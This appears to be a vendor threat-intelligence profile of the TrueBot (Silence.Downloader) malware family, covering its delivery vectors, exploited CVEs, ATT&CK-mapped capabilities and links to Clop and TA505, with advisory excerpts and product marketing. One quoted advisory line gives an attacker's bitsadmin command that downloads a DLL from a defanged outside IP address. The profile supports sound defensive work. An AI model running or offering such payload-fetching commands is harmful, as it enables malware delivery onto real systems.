TrueBot, also known as Silence.Downloader, is a Windows malware family primarily used as a downloader and access-enablement tool in financially motivated intrusions. It has been observed since at least 2017 and has been linked to the Silence ecosystem, with repeated reporting also connecting its operations and follow-on payloads to TA505 and Clop-associated activity. TrueBot has been used both as an initial foothold and as a staging mechanism for broader post-compromise operations, including delivery of FlawedGrace, Cobalt Strike, and in some intrusions the lead-up to Clop ransomware deployment and double extortion.
Historically, TrueBot has been delivered through phishing campaigns using malicious attachments or links. More recent activity shows a shift toward exploitation of exposed enterprise software, notably CVE-2022-31199 in Netwrix Auditor, as well as secondary delivery through Raspberry Robin infections. It has also appeared in intrusion chains associated with exploitation of PaperCut vulnerabilities. These patterns indicate that operators use TrueBot flexibly across both email-borne and vulnerability-driven access operations.
Functionally, TrueBot performs host reconnaissance and establishes command-and-control communications to receive additional tasks and payloads. Reported capabilities include collecting system and domain information, enumerating running processes, identifying security software, taking screenshots, and gathering Active Directory trust information. Variants have been described as capable of downloading and executing additional payloads in multiple formats, loading DLLs and shellcode directly in memory, and deleting operational artifacts. TrueBot activity has also been associated with self-replication or propagation within victim environments, enabling broader compromise after initial execution.
In observed intrusions, TrueBot commonly serves as a precursor to hands-on-keyboard activity. Follow-on operations have included deployment of Cobalt Strike for persistence and lateral movement, credential theft through LSASS dumping and pass-the-hash activity, and data theft using a custom exfiltration utility known as Teleport. In at least one documented case, attackers used TrueBot-enabled access to map networks, browse file systems, query databases, exfiltrate data, and then coordinate widespread ransomware execution via scheduled tasks. Reporting also notes use of Grace malware as a downstream payload, reinforcing the long-observed overlap between the Silence and TA505 toolchains.
Targeting has included organizations in the United States and Canada, with infections also observed globally. Campaign reporting highlights compromises of internet-exposed Windows servers and activity affecting sectors such as education, while broader actor associations connect TrueBot-enabled intrusions to financially motivated attacks against enterprise environments. TrueBot is best understood as an actively maintained downloader/backdoor component in a larger criminal intrusion ecosystem, valued for reconnaissance, payload delivery, and support of post-exploitation, exfiltration, and ransomware operations.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
6 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
Netwrix vulnerability (CVE-2022-31199) based delivery ... we believe with high confidence that these events are the result of the exploitation of a vulnerability in Netwrix Auditor (CVE-2022-31199) ... “Netwrix Auditor is vulnerable to an insecure object deserialization issue that is caused by an unsecured .NET remoting service. An attacker can submit arbitrary objects to the application through this service to achieve remote code execution on Netwrix Auditor servers.” | Since August 2022, we have seen an increase in infections of Truebot (aka Silence.Downloader) malware.
soit sous la forme d’un document exploitant les CVE-2017-0199 et CVE-2017-11882 qui télécharge et exécute un fichier HTA contenant un VBScript ; | En cliquant sur la pièce jointe malveillante, la victime déclenche la propagation automatique au sein du système d’information (SI) de l’outil d’administration à distance Truebot (ou Silence.Downloader). Ce code malveillant, en communiquant avec le C2, est utilisé pour propager d’autres charges utiles.
soit sous la forme d’un document exploitant les CVE-2017-0199 et CVE-2017-11882 qui télécharge et exécute un fichier HTA contenant un VBScript ; | En cliquant sur la pièce jointe malveillante, la victime déclenche la propagation automatique au sein du système d’information (SI) de l’outil d’administration à distance Truebot (ou Silence.Downloader). Ce code malveillant, en communiquant avec le C2, est utilisé pour propager d’autres charges utiles.
The Federal Bureau of Investigation (FBI) and Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint Cybersecurity Advisory (CSA) in response to the active exploitation of CVE-2023-27350. This vulnerability occurs in certain versions of PaperCut NG and PaperCut MF and enables an unauthenticated actor to execute malicious code remotely without credentials. | The FBI also identified information relating to the download and execution of command and control (C2) malware such as DiceLoader, TrueBot, and Cobalt Strike Beacons, although it is unclear at which stage in the attack these tools were executed.
In late January 2023, the CL0P ransomware group launched a campaign using a zero-day vulnerability, now catalogued as CVE-2023-0669, to target the GoAnywhere MFT platform.
Once they gained access to the server, they deployed the TrueBot malware, which has also been previously linked to the Clop ransomware operation.
7 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Il existe des liens de codes et d’infrastructure entre FlawedAmmyy et Truebot (aka Silence.Downloader)...
Since August 2022, we have seen an increase in infections of Truebot (aka Silence.Downloader) malware.
Since August 2022, we have seen an increase in infections of Truebot (aka Silence.Downloader) malware.
As recently as May 31, 2023, the authoring organizations have observed an increase in cyber threat actors using new malware variants of Truebot (also known as Silence.Downloader). Truebot is a botnet that has been used by malicious cyber groups like CL0P Ransomware Gang to collect and exfiltrate information from its target victims.
We found connections between ShadowSyndicate infrastructure and Cl0p/Truebot substantiating previous findings of GroupIB
The FBI also identified information relating to the download and execution of command and control (C2) malware such as DiceLoader, TrueBot, and Cobalt Strike Beacons, although it is unclear at which stage in the attack these tools were executed.
36 distinct techniques documented for this family, organized by ATT&CK tactic.
In October, a larger number of infections leveraged Raspberry Robin, a recent malware spread through USB drives, as a delivery vector.
During the investigation, we identified the source of the infection to be a malicious ad that the user encountered while looking to download Google Sheets. This ad redirected the user to a malicious page serving a downloader for StealC infostealer malware.
cyber threat actors have shifted tactics, exploiting, in observable manner, a remote code execution vulnerability (CVE-2022-31199) in Netwrix Auditor [T1190].
Recently, the attackers have shifted from using malicious emails as their primary delivery method to other techniques.
Ces courriels contiennent une pièce jointe malveillante : soit sous la forme d’un document Word contenant une macro ou un exploit ; soit sous la forme d’un fichier ZIP ou RAR contenant un fichier CHM ; soit sous la forme d’un document exploitant les CVE-2017-0199 et CVE-2017-11882 ... ; soit sous la forme d’un fichier .lnk.
Based on confirmation from open-source reporting and analytical findings of Truebot variants, the authoring organizations assess cyber threat actors are leveraging both phishing campaigns with malicious redirect hyperlinks... to deliver new Truebot malware variants.
Besides downloading and executing files, the malware is now able to load and execute additional modules and shellcodes in memory
C:\Windows\System32\cmd.exe /c bitsadmin /transfer MSVCP hxxp://179[.]60[.]150[.]53:80/download/msruntime.dll
Besides downloading and executing files, the malware is now able to load and execute additional modules and shellcodes in memory
In August, we saw a small number of attacks that exploited a recent remote code execution vulnerability in Netwrix auditor.
This variant of Truebot malware is designed with over one gigabyte (GB) of junk code which functions to hinder detection and analysis efforts [T1027.001].
Next, it uses a .JSONIP extension... to create a thirteen character globally unique identifier (GUID)... [T1036].
Truebot malware can be hidden within various, legitimate file formats that are used for malicious purposes [T1036.008].
Several hours post initial access, Truebot has been observed injecting Cobalt Strike beacons into memory [T1055] in a dormant mode for the first few hours prior to initiating additional operations.
With this established connection, Truebot uses a second obfuscated domain to receive additional payloads [T1105], self-replicate across the environment [T1570], and/or delete files used in its operations [T1070.004].
the malicious process downloaded the Truebot .dll file and executed it using rundll32.exe.
the affected system’s computer and domain name [T1082][T1016], along with the newly generated GUID, are sent to a hard-coded URL in a POST request
Following the initial checks for system information, Truebot has the capability to enumerate all running processes [T1057].
Once a system is infected, the malware collects information and sends it to the attacker’s command and control (C2). This version collects additional information: a screenshot, the computer name, the local network name
Truebot also has the ability to discover ... system time metrics... to facilitate scheduling tasks [T1124].
This version collects additional information: a screenshot, the computer name, the local network name, and active directory trust relations.
Upon execution, the malware immediately begins to look for EDR and antivirus software.
In October, a larger number of infections leveraged Raspberry Robin, a recent malware spread through USB drives, as a delivery vector.
the HTTP communication includes new fields to include the network name and trust relations data and it is sent as a POST request with a parameter “q=<base64 encoded data>”.
327 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
20 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Malware payload observed being distributed through Raspberry Robin access.
Named malware mentioned as appearing in the same subnets discussed; the content provides no additional technical description beyond this co-occurrence.
Botnet malware associated with ShadowSyndicate and linked to ransomware operations.
Downloader malware operation linked in the report to ShadowSyndicate infrastructure overlaps and to Cl0p/Evil Corp activity.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.